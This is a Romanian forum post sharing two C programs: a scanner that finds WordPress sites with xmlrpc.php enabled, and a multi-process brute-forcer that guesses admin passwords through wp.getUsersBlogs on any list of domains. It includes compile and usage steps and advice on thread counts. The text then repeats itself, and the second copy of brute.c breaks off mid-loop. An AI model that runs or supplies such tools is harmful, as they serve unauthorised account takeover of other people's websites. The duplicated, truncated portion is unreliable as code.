
[RST] Wordpress xmlrpc.php Brute


Am tot vazut brute-uri pentru Wordpress, dar majoritatea pe wp-login.php, asa ca am decis sa fac unul pentru xmlrpc.php.

===== brute.c =====


#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <unistd.h>

#define RED "\E[32;31m"
#define GREEN "\E[32;40m"
#define NORMAL "\E[m"

void usage(char *s);
int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link);
FILE *ipfile, *userfile, *passfile, *outfile, *badfile;
int numforks = 0;

/* Print the coloured banner and the usage line for program name <s>,
 * then terminate with EXIT_SUCCESS.  Never returns. */
void usage(char *s) {
    /* Banner: red title, a green newline, the tagline, then reset the
     * terminal attributes with NORMAL. */
    fputs(RED "ELITE WP BruteF0rce" GREEN "\n" GREEN, stdout);
    fputs("Smoke w33d everyday;)\n" NORMAL, stdout);
    printf("Usage: %s <ips file> <userfile> <passfile> <threads>\n", s);
    exit(EXIT_SUCCESS);
}

/*
 * Send one wp.getUsersBlogs XML-RPC call over plain HTTP to <victim>:80 at
 * path <link> and, when the reply contains "isAdmin", print the pair and
 * append it to "wp.log".
 *
 * victim   host name or dotted address, resolved with gethostbyname().
 * user     only used in the printed/logged line; the request body below
 *          always carries the literal "admin".
 * pass     candidate password, copied into the XML body without escaping.
 * outfile  ignored on entry; overwritten by a fresh fopen("wp.log", "a+").
 * link     request path (second column of the list file); NULL reaches
 *          strcat() below if the list line had no second field.
 *
 * Returns 0 after a completed exchange.  Every failure path calls exit()
 * instead of returning; main() calls this from a fork()ed child, so exit()
 * ends only that child.
 */
int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link) {
/* rc, server, ulen and plen are declared but never used. */
int sockfd, n, rc, valopt;
struct sockaddr_in serv_addr;
struct hostent *server;
struct timeval timeout, tread;
size_t ulen, plen;
long arg;
fd_set myset;
socklen_t lon;
/* Unresolvable host: end this child quietly. */
struct hostent *hl = gethostbyname(victim);
if(!hl) exit(0);
/* The first address is copied byte-wise into a long; assumes h_length fits
 * in sizeof(long) (4 bytes for AF_INET) — not checked. */
long ipadd;
memset(&ipadd, 0, sizeof(ipadd));
memcpy(&ipadd, hl->h_addr, hl->h_length);

/* 4 s for the non-blocking connect below, 10 s for each read/write. */
timeout.tv_sec = 4;
timeout.tv_usec = 0;
tread.tv_sec = 10;
tread.tv_usec = 0;

/* Fixed-size buffers filled with strcpy/strcat and no length checks. */
char buffer[2048], postvar[1024], clen[256];

sockfd = socket(AF_INET, SOCK_STREAM, 0);

/* Non-blocking mode is set before sockfd is checked for failure. */
arg = fcntl(sockfd, F_GETFL, NULL);
arg |= O_NONBLOCK;
fcntl(sockfd, F_SETFL, arg);

if (sockfd < 0) {
perror("ERROR opening socket");
exit(1);
}

/* NOTE(review): error() is not declared by any header included in this
 * file; the call is an implicit declaration. */
if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

/* Always TCP port 80: plain HTTP, no TLS. */
bzero(&serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr=ipadd;
serv_addr.sin_port=htons(80);

/* Non-blocking connect: wait up to <timeout> for writability, then read
 * SO_ERROR.  Any failure (timeout, refused, other errno) ends the child
 * with exit(0), so nothing is logged for unreachable hosts. */
if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) {
if (errno == EINPROGRESS) {
FD_ZERO(&myset);
FD_SET(sockfd, &myset);
if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) {
lon = sizeof(int);
getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if (valopt) {
exit(0);
}
}
else {
exit(0);
}
}
else {
exit(0);
}
}

/* Back to blocking mode so the SO_*TIMEO values govern write()/read(). */
arg = fcntl(sockfd, F_GETFL, NULL);
arg &= (~O_NONBLOCK);
fcntl(sockfd, F_SETFL, arg);

/* XML-RPC body.  The username is the literal "admin" regardless of <user>;
 * <pass> is inserted verbatim (no XML escaping).  "%d" with a size_t
 * argument is a format/type mismatch. */
strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>");
strcat(postvar, "<string>admin</string></value></param><param><value><string>");
strcat(postvar, pass);
strcat(postvar, "</string></value></param></params></methodCall>");
sprintf(clen, "%d", strlen(postvar));

bzero(buffer, 2048);

/* Raw HTTP/1.1 request.  The User-Agent, Accept, Content-Type and Cookie
 * lines are constant for every request this tool sends, so together with
 * the wp.getUsersBlogs method they form a stable fingerprint in web-server
 * logs.  Content-Length covers postvar only; the trailing "\r\n\r\n" after
 * the body is not counted. */
strcpy(buffer, "POST ");
strcat(buffer, link);
strcat(buffer, " HTTP/1.1\r\n");
strcat(buffer, "Host: ");
strcat(buffer, victim);
strcat(buffer, "\r\nConnection: keep-alive\r\n");
strcat(buffer, "Content-Length: ");
strcat(buffer, clen);
strcat(buffer, "\r\nCache-Control: max-age=0\r\n");
strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n");
strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n");
strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n");
strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check");
strcat(buffer, "\r\n\r\n");
strcat(buffer, postvar);
strcat(buffer, "\r\n\r\n");

/* Single write; a short write is not retried. */
n = write(sockfd,buffer,strlen(buffer));

if (n < 0) {
exit(1);
}

/* Single read of at most 2047 bytes; anything beyond that in the response
 * is never seen. */
bzero(buffer,2048);
n = read(sockfd,buffer,2047);

if (n < 0) {
exit(1);
}

/* Substring match on the raw response ("isAdmin" is presumably a member of
 * a successful wp.getUsersBlogs reply — confirm).  The fopen() result is
 * not checked before fprintf(). */
if(strstr(buffer, "isAdmin")) {
printf("[+]Found: %s%s - %s %s\n", victim, link, user, pass);
outfile = fopen("wp.log", "a+");
fprintf(outfile, "%s%s - %s %s\n", victim, link, user, pass);
fclose(outfile);
}

close(sockfd);
return 0;
}
/*
 * Entry point.  argv[1] = list file ("host path" per line, the format
 * checker.c writes to out.log), argv[2] = user list, argv[3] = password
 * list, argv[4] = maximum number of concurrent child processes.  For every
 * (user, password, host) combination a child is fork()ed that calls
 * getvuln(); hosts already present anywhere in "wp.log" are skipped.
 */
int main(int argc, char *argv[]) {
/* All buffers are fixed-size and filled with strcpy/strcat without length
 * checks; processed (512000 bytes on the stack) holds the whole of wp.log. */
char *ip, user[1024], invtmp[1024], pass[1024], *link, tok[1024], processed[512000];
processed[0]=0;
/* time() is used below although <time.h> is not included in this file. */
time_t start;
if (argc < 5) usage(argv[0]);
/* The labels do not match the arguments: argv[2] is the user file and the
 * process limit is argv[4]. */
printf("[*] List: %s Threads: %s FILE: %s\n", argv[1], argv[2], argv[3]);
start = time(0);

/* The three input files are opened here only to confirm they can be read;
 * they are reopened inside the loops. */
if(!(ipfile = fopen(argv[1], "r"))) {
printf("INVALID DOMAINS FILE: %s\n", argv[1]);
exit(0);
}
fclose(ipfile);

if(!(userfile = fopen(argv[2], "r"))) {
printf("INVALID USERS FILE: %s\n", argv[2]);
exit(0);
}
fclose(userfile);

if(!(passfile = fopen(argv[3], "r"))) {
printf("INVALID PASSWORDS FILE: %s\n", argv[3]);
exit(0);
}
fclose(passfile);

/* Create error.tmp and wp.log if absent.  error.tmp is never used again in
 * this file.  If the "a+" fopen also fails, fclose() receives NULL. */
if(!(badfile = fopen("error.tmp", "r"))) badfile = fopen("error.tmp", "a+");
fclose(badfile);

if(!(badfile = fopen("wp.log", "r"))) badfile = fopen("wp.log", "a+");
fclose(badfile);

/* Outer loop: one user per line. */
userfile = fopen(argv[2], "r");
while(1) {
if(!fgets((char *)&user, sizeof(user), userfile)) break;
/* Strip the trailing newline.  strlen()-1 underflows for an empty string,
 * which fgets() only yields when the line starts with a NUL byte. */
if (user[strlen (user) - 1] == '\n') user[strlen (user) - 1] = '\0';
/* user is an array, so this condition is always true (same for pass and
 * tok below). */
if (user) {
/* Middle loop: one password per line, password file reopened per user. */
passfile = fopen(argv[3], "r");
while (1) {
if(!fgets((char *)&pass, sizeof(pass), passfile)) break;
if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0';
if (pass) {
/* Re-read wp.log in full for every password so hosts logged by an earlier
 * child are skipped below.  strcat() into processed is unbounded and the
 * fopen() result is not checked. */
badfile = fopen("wp.log", "r");
strcpy(processed, "");
while (1) {
if(!fgets((char *)&invtmp, sizeof(invtmp), badfile)) break;
strcat(processed, invtmp);
}
fclose(badfile);
/* Inner loop: one "host path" line per host. */
ipfile = fopen(argv[1], "r");
while (1) {
if(!fgets((char *)&tok, sizeof(tok), ipfile)) break;
if (tok[strlen (tok) - 1] == '\n') tok[strlen (tok) - 1] = '\0';
if (tok) {
/* ip2/pass2 are 256 bytes while tok/pass are 1024.  link is NULL when the
 * line has no second field; getvuln() then hands NULL to strcat(). */
char ip2[256], pass2[256];
ip = strtok(tok, " ");
link = strtok(NULL, " ");
strcpy(ip2, ip);
strcpy(pass2, pass);
/* "DOMAIN%" anywhere in the password means "derive the candidate from the
 * host name".  The three checks drop a '.'-separated suffix of 4, 3 or 2
 * characters from the end of ip2, each running on the already-shortened
 * string; the index underflows for hosts shorter than 5 characters. */
if(strstr(pass2, "DOMAIN%")) {
if(ip2[strlen(ip2)-5] == '.') ip2[strlen(ip2)-5] = '\0';
if(ip2[strlen(ip2)-4] == '.') ip2[strlen(ip2)-4] = '\0';
if(ip2[strlen(ip2)-3] == '.') ip2[strlen(ip2)-3] = '\0';
/* Two copies of the same routine: copy ip2 into tmp (skipping the first 4
 * characters when "www." occurs anywhere in it, else from the start), then
 * append the password text after its first 7 characters (the length of
 * "DOMAIN%", regardless of where strstr() found it).  tmp/tmpass are 128
 * bytes while ip2/pass2 are 256. */
if(strstr(ip2, "www.")) {
char tmp[128],tmpass[128];
int ivar,jvar=0;

for(ivar=4;ivar<strlen(ip2);ivar++) {
tmp[jvar] = ip2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcpy(tmpass, tmp);
strcpy(tmp, "");
jvar=0;

for(ivar=7;ivar<strlen(pass2);ivar++) {
tmp[jvar] = pass2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcat(tmpass, tmp);
strcpy(pass2, tmpass);
}

else {
char tmp[128],tmpass[128];
int ivar,jvar=0;

for(ivar=0;ivar<strlen(ip2);ivar++) {
tmp[jvar] = ip2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcpy(tmpass, tmp);
strcpy(tmp, "");
jvar=0;

for(ivar=7;ivar<strlen(pass2);ivar++) {
tmp[jvar] = pass2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcat(tmpass, tmp);
strcpy(pass2, tmpass);
}
}

/* Skip hosts that already occur anywhere in wp.log.  This is a substring
 * test, so a shorter host name also matches lines for a longer one. */
if(!strstr(processed, ip)) {
/* Child: one request, then exit.  Parent: count children and, once above
 * the argv[4] limit, wait() until back at the limit.  The first clause of
 * the for is a no-op.  numforks is only decremented here, so children that
 * finish early are not reaped until the limit is reached. */
if(!(fork())) {
getvuln(ip,user,pass2,outfile,link);
exit(0);
}
else {
numforks++;
if (numforks > atoi(argv[4])) for (numforks; numforks > atoi(argv[4]); numforks--) wait(NULL);
}
}
}
}
fclose(ipfile);
}
}
fclose(passfile);
}
}
fclose(userfile);

/* %lu does not match time_t in general. */
printf("[*] Completed in: %lu secs\n", (time(0) - start));
exit(EXIT_SUCCESS);
}

===== checker.c =====


#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define RED "\E[32;31m"
#define GREEN "\E[32;40m"
#define NORMAL "\E[m"

void usage(char *s);
int getvuln(char *victim, char *link, FILE *outfile);
FILE *ipfile, *userfile, *passfile, *outfile, *badfile;
int numforks = 0;

/* Print the coloured banner and the usage line for program name <s>,
 * then terminate with EXIT_SUCCESS.  Never returns.  The banner still
 * says "SMTP" although this program probes xmlrpc.php; it looks copied
 * from another tool. */
void usage(char *s) {
    fputs(RED "ELITE SMTP BruteF0rce" GREEN "\n" GREEN, stdout);
    fputs("Smoke w33d everyday;)\n" NORMAL, stdout);
    printf("Usage: %s <IPs file> <threads>\n", s);
    exit(EXIT_SUCCESS);
}

/*
 * Send one wp.getUsersBlogs XML-RPC call over plain HTTP to <victim>:80 at
 * path <link> using a fixed dummy credential and, when the reply contains
 * "<int>403</int>", print the host and write "host path" to <outfile>.
 *
 * victim   host name or dotted address, resolved with gethostbyname().
 * link     request path, supplied by main() as a string literal.
 * outfile  already-open FILE (out.log, opened in main() before fork()).
 *
 * Returns 0 after a completed exchange.  Every failure path calls exit()
 * instead of returning; main() calls this from a fork()ed child, so exit()
 * ends only that child.
 */
int getvuln(char *victim, char *link, FILE *outfile) {
/* rc, server, ulen and plen are declared but never used. */
int sockfd, n, rc, valopt;
struct sockaddr_in serv_addr;
struct hostent *server;
struct timeval timeout, tread;
size_t ulen, plen;
long arg;
fd_set myset;
socklen_t lon;
/* Unresolvable host: end this child quietly. */
struct hostent *hl = gethostbyname(victim);
if(!hl) exit(0);
/* The first address is copied byte-wise into a long; assumes h_length fits
 * in sizeof(long) (4 bytes for AF_INET) — not checked. */
long ipadd;
memset(&ipadd, 0, sizeof(ipadd));
memcpy(&ipadd, hl->h_addr, hl->h_length);

/* 4 s for the non-blocking connect below, 10 s for each read/write. */
timeout.tv_sec = 4;
timeout.tv_usec = 0;
tread.tv_sec = 10;
tread.tv_usec = 0;

/* Fixed-size buffers filled with strcpy/strcat and no length checks. */
char buffer[2048], postvar[2048], clen[256];

sockfd = socket(AF_INET, SOCK_STREAM, 0);

/* Non-blocking mode is set before sockfd is checked for failure. */
arg = fcntl(sockfd, F_GETFL, NULL);
arg |= O_NONBLOCK;
fcntl(sockfd, F_SETFL, arg);

if (sockfd < 0) {
perror("ERROR opening socket");
exit(1);
}

/* NOTE(review): error() is not declared by any header included in this
 * file; the call is an implicit declaration. */
if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

/* Always TCP port 80: plain HTTP, no TLS. */
bzero(&serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr=ipadd;
serv_addr.sin_port=htons(80);

/* Non-blocking connect: wait up to <timeout> for writability, then read
 * SO_ERROR.  Any failure (timeout, refused, other errno) ends the child
 * with exit(0), so nothing is logged for unreachable hosts. */
if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) {
if (errno == EINPROGRESS) {
FD_ZERO(&myset);
FD_SET(sockfd, &myset);
if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) {
lon = sizeof(int);
getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if (valopt) {
exit(0);
}
}
else {
exit(0);
}
}
else {
exit(0);
}
}

/* Back to blocking mode so the SO_*TIMEO values govern write()/read(). */
arg = fcntl(sockfd, F_GETFL, NULL);
arg &= (~O_NONBLOCK);
fcntl(sockfd, F_SETFL, arg);

/* XML-RPC body with the fixed credential admin / narecumsafie55; the reply
 * to this is what decides whether the endpoint is recorded.  "%d" with a
 * size_t argument is a format/type mismatch. */
strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>");
strcat(postvar, "<string>admin</string></value></param><param><value><string>narecumsafie55");
strcat(postvar, "</string></value></param></params></methodCall>");
sprintf(clen, "%d", strlen(postvar));

bzero(buffer, 2048);

/* Raw HTTP/1.1 request.  The User-Agent, Accept, Content-Type and Cookie
 * lines are constant for every request this tool sends, so together with
 * the wp.getUsersBlogs method they form a stable fingerprint in web-server
 * logs.  Content-Length covers postvar only; the trailing "\r\n\r\n" after
 * the body is not counted. */
strcpy(buffer, "POST ");
strcat(buffer, link);
strcat(buffer, " HTTP/1.1\r\n");
strcat(buffer, "Host: ");
strcat(buffer, victim);
strcat(buffer, "\r\nConnection: keep-alive\r\n");
strcat(buffer, "Content-Length: ");
strcat(buffer, clen);
strcat(buffer, "\r\nCache-Control: max-age=0\r\n");
strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n");
strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n");
strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n");
strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check");
strcat(buffer, "\r\n\r\n");
strcat(buffer, postvar);
strcat(buffer, "\r\n\r\n");

/* Single write; a short write is not retried. */
n = write(sockfd,buffer,strlen(buffer));

if (n < 0) {
exit(1);
}

/* Single read of at most 2047 bytes; anything beyond that in the response
 * is never seen. */
bzero(buffer,2048);
n = read(sockfd, buffer, 2047);

if (n < 0) {
exit(1);
}

/* Substring match on the raw response.  "<int>403</int>" is presumably the
 * faultCode a WordPress XML-RPC endpoint returns for a rejected login, i.e.
 * the endpoint is enabled and answering — confirm.  The line written here
 * ("host path") is the input format brute.c expects.  outfile is the FILE
 * inherited from the parent; stdio buffering means the line is flushed
 * when this child exits, and concurrent children may interleave lines. */
if(strstr(buffer, "<int>403</int>")) {
printf("[+]Found: %s - %s\n", victim, link);
fprintf(outfile, "%s %s\n", victim, link);
}

close(sockfd);
return 0;
}
/*
 * Entry point.  argv[1] = list of hosts (one per line), argv[2] = maximum
 * number of concurrent child processes.  For every host two children are
 * fork()ed, one per candidate path ("/xmlrpc.php" and "/blog/xmlrpc.php"),
 * each calling getvuln() and writing hits to out.log.
 */
int main(int argc, char *argv[]) {
char ip[1024];

/* time() is used below although <time.h> is not included in this file. */
time_t start;
/* argc < 2 admits a run with only argv[1]; argv[2] is then NULL and is
 * still passed to printf("%s") and atoi() below. */
if (argc < 2) usage(argv[0]);
/* Opened once in the parent and inherited by every child; the fopen()
 * result is not checked. */
outfile = fopen("out.log", "a+");
printf("[*] List: %s Threads: %s FILE: out.log\n", argv[1], argv[2]);
start = time(0);

if(!(ipfile = fopen(argv[1], "r"))) {
printf("INVALID DOMAINS FILE: %s\n", argv[1]);
exit(0);
}

while(1) {
if(!fgets((char *)&ip, sizeof(ip), ipfile)) break;
/* Strip the trailing newline.  strlen()-1 underflows for an empty string,
 * which fgets() only yields when the line starts with a NUL byte. */
if (ip[strlen(ip)-1] == '\n') ip[strlen(ip)-1] = '\0';
/* ip is an array, so this condition is always true. */
if (ip) {
/* Child: one request, then exit.  Parent: count children and, once above
 * the argv[2] limit, wait() until back at the limit.  The first clause of
 * the for is a no-op.  numforks is only decremented here, so children that
 * finish early are not reaped until the limit is reached. */
if(!(fork())) {
getvuln(ip,"/xmlrpc.php",outfile);
exit(0);
}
else {
numforks++;
if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL);
}
/* Same again for the second candidate path. */
if(!(fork())) {
getvuln(ip,"/blog/xmlrpc.php",outfile);
exit(0);
}
else {
numforks++;
if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL);
}
}
}
fclose(ipfile);

/* Children still running are not waited for here.  %lu does not match
 * time_t in general. */
printf("[*] Completed in: %lu secs\n", (time(0) - start));
exit(EXIT_SUCCESS);
}

Pentru compilare:

gcc -o checker checker.c

gcc -o brute brute.c

Folositi checker pe o lista de domenii sau IPuri pentru a vedea care din acestea accepta autentificarea prin xmlrpc.php. Acesta va crea un fisier out.log.

Usage: ./checker <IPs file> <threads>

Pentru a incepe brute faceti o lista de useri, una de parole si porniti:

./brute out.log users.txt passwords.txt <threads>

Threaduri am incercat pana la 1000 si merge ok, dar pentru siguranta folositi 300-400.

Astept sugestii :)

Am tot vazut brute-uri pentru Wordpress, dar majoritatea pe wp-login.php, asa ca am decis sa fac unul pentru xmlrpc.php.

===== brute.c =====


#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <unistd.h>

#define RED "\E[32;31m"
#define GREEN "\E[32;40m"
#define NORMAL "\E[m"

void usage(char *s);
int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link);
FILE *ipfile, *userfile, *passfile, *outfile, *badfile;
int numforks = 0;

/* Print the coloured banner and the usage line for program name <s>,
 * then terminate with EXIT_SUCCESS.  Never returns. */
void usage(char *s) {
    /* Banner: red title, a green newline, the tagline, then reset the
     * terminal attributes with NORMAL. */
    fputs(RED "ELITE WP BruteF0rce" GREEN "\n" GREEN, stdout);
    fputs("Smoke w33d everyday;)\n" NORMAL, stdout);
    printf("Usage: %s <ips file> <userfile> <passfile> <threads>\n", s);
    exit(EXIT_SUCCESS);
}

/*
 * Send one wp.getUsersBlogs XML-RPC call over plain HTTP to <victim>:80 at
 * path <link> and, when the reply contains "isAdmin", print the pair and
 * append it to "wp.log".
 *
 * victim   host name or dotted address, resolved with gethostbyname().
 * user     only used in the printed/logged line; the request body below
 *          always carries the literal "admin".
 * pass     candidate password, copied into the XML body without escaping.
 * outfile  ignored on entry; overwritten by a fresh fopen("wp.log", "a+").
 * link     request path (second column of the list file); NULL reaches
 *          strcat() below if the list line had no second field.
 *
 * Returns 0 after a completed exchange.  Every failure path calls exit()
 * instead of returning; main() calls this from a fork()ed child, so exit()
 * ends only that child.
 */
int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link) {
/* rc, server, ulen and plen are declared but never used. */
int sockfd, n, rc, valopt;
struct sockaddr_in serv_addr;
struct hostent *server;
struct timeval timeout, tread;
size_t ulen, plen;
long arg;
fd_set myset;
socklen_t lon;
/* Unresolvable host: end this child quietly. */
struct hostent *hl = gethostbyname(victim);
if(!hl) exit(0);
/* The first address is copied byte-wise into a long; assumes h_length fits
 * in sizeof(long) (4 bytes for AF_INET) — not checked. */
long ipadd;
memset(&ipadd, 0, sizeof(ipadd));
memcpy(&ipadd, hl->h_addr, hl->h_length);

/* 4 s for the non-blocking connect below, 10 s for each read/write. */
timeout.tv_sec = 4;
timeout.tv_usec = 0;
tread.tv_sec = 10;
tread.tv_usec = 0;

/* Fixed-size buffers filled with strcpy/strcat and no length checks. */
char buffer[2048], postvar[1024], clen[256];

sockfd = socket(AF_INET, SOCK_STREAM, 0);

/* Non-blocking mode is set before sockfd is checked for failure. */
arg = fcntl(sockfd, F_GETFL, NULL);
arg |= O_NONBLOCK;
fcntl(sockfd, F_SETFL, arg);

if (sockfd < 0) {
perror("ERROR opening socket");
exit(1);
}

/* NOTE(review): error() is not declared by any header included in this
 * file; the call is an implicit declaration. */
if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

/* Always TCP port 80: plain HTTP, no TLS. */
bzero(&serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr=ipadd;
serv_addr.sin_port=htons(80);

/* Non-blocking connect: wait up to <timeout> for writability, then read
 * SO_ERROR.  Any failure (timeout, refused, other errno) ends the child
 * with exit(0), so nothing is logged for unreachable hosts. */
if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) {
if (errno == EINPROGRESS) {
FD_ZERO(&myset);
FD_SET(sockfd, &myset);
if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) {
lon = sizeof(int);
getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if (valopt) {
exit(0);
}
}
else {
exit(0);
}
}
else {
exit(0);
}
}

/* Back to blocking mode so the SO_*TIMEO values govern write()/read(). */
arg = fcntl(sockfd, F_GETFL, NULL);
arg &= (~O_NONBLOCK);
fcntl(sockfd, F_SETFL, arg);

/* XML-RPC body.  The username is the literal "admin" regardless of <user>;
 * <pass> is inserted verbatim (no XML escaping).  "%d" with a size_t
 * argument is a format/type mismatch. */
strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>");
strcat(postvar, "<string>admin</string></value></param><param><value><string>");
strcat(postvar, pass);
strcat(postvar, "</string></value></param></params></methodCall>");
sprintf(clen, "%d", strlen(postvar));

bzero(buffer, 2048);

/* Raw HTTP/1.1 request.  The User-Agent, Accept, Content-Type and Cookie
 * lines are constant for every request this tool sends, so together with
 * the wp.getUsersBlogs method they form a stable fingerprint in web-server
 * logs.  Content-Length covers postvar only; the trailing "\r\n\r\n" after
 * the body is not counted. */
strcpy(buffer, "POST ");
strcat(buffer, link);
strcat(buffer, " HTTP/1.1\r\n");
strcat(buffer, "Host: ");
strcat(buffer, victim);
strcat(buffer, "\r\nConnection: keep-alive\r\n");
strcat(buffer, "Content-Length: ");
strcat(buffer, clen);
strcat(buffer, "\r\nCache-Control: max-age=0\r\n");
strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n");
strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n");
strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n");
strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check");
strcat(buffer, "\r\n\r\n");
strcat(buffer, postvar);
strcat(buffer, "\r\n\r\n");

/* Single write; a short write is not retried. */
n = write(sockfd,buffer,strlen(buffer));

if (n < 0) {
exit(1);
}

/* Single read of at most 2047 bytes; anything beyond that in the response
 * is never seen. */
bzero(buffer,2048);
n = read(sockfd,buffer,2047);

if (n < 0) {
exit(1);
}

/* Substring match on the raw response ("isAdmin" is presumably a member of
 * a successful wp.getUsersBlogs reply — confirm).  The fopen() result is
 * not checked before fprintf(). */
if(strstr(buffer, "isAdmin")) {
printf("[+]Found: %s%s - %s %s\n", victim, link, user, pass);
outfile = fopen("wp.log", "a+");
fprintf(outfile, "%s%s - %s %s\n", victim, link, user, pass);
fclose(outfile);
}

close(sockfd);
return 0;
}
/*
 * Entry point.  argv[1] = list file ("host path" per line, the format
 * checker.c writes to out.log), argv[2] = user list, argv[3] = password
 * list, argv[4] = maximum number of concurrent child processes.  For every
 * (user, password, host) combination a child is fork()ed that calls
 * getvuln(); hosts already present anywhere in "wp.log" are skipped.
 */
int main(int argc, char *argv[]) {
/* All buffers are fixed-size and filled with strcpy/strcat without length
 * checks; processed (512000 bytes on the stack) holds the whole of wp.log. */
char *ip, user[1024], invtmp[1024], pass[1024], *link, tok[1024], processed[512000];
processed[0]=0;
/* time() is used below although <time.h> is not included in this file. */
time_t start;
if (argc < 5) usage(argv[0]);
/* The labels do not match the arguments: argv[2] is the user file and the
 * process limit is argv[4]. */
printf("[*] List: %s Threads: %s FILE: %s\n", argv[1], argv[2], argv[3]);
start = time(0);

/* The three input files are opened here only to confirm they can be read;
 * they are reopened inside the loops. */
if(!(ipfile = fopen(argv[1], "r"))) {
printf("INVALID DOMAINS FILE: %s\n", argv[1]);
exit(0);
}
fclose(ipfile);

if(!(userfile = fopen(argv[2], "r"))) {
printf("INVALID USERS FILE: %s\n", argv[2]);
exit(0);
}
fclose(userfile);

if(!(passfile = fopen(argv[3], "r"))) {
printf("INVALID PASSWORDS FILE: %s\n", argv[3]);
exit(0);
}
fclose(passfile);

/* Create error.tmp and wp.log if absent.  error.tmp is never used again in
 * this file.  If the "a+" fopen also fails, fclose() receives NULL. */
if(!(badfile = fopen("error.tmp", "r"))) badfile = fopen("error.tmp", "a+");
fclose(badfile);

if(!(badfile = fopen("wp.log", "r"))) badfile = fopen("wp.log", "a+");
fclose(badfile);

/* Outer loop: one user per line. */
userfile = fopen(argv[2], "r");
while(1) {
if(!fgets((char *)&user, sizeof(user), userfile)) break;
/* Strip the trailing newline.  strlen()-1 underflows for an empty string,
 * which fgets() only yields when the line starts with a NUL byte. */
if (user[strlen (user) - 1] == '\n') user[strlen (user) - 1] = '\0';
/* user is an array, so this condition is always true (same for pass and
 * tok below). */
if (user) {
/* Middle loop: one password per line, password file reopened per user. */
passfile = fopen(argv[3], "r");
while (1) {
if(!fgets((char *)&pass, sizeof(pass), passfile)) break;
if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0';
if (pass) {
/* Re-read wp.log in full for every password so hosts logged by an earlier
 * child are skipped below.  strcat() into processed is unbounded and the
 * fopen() result is not checked. */
badfile = fopen("wp.log", "r");
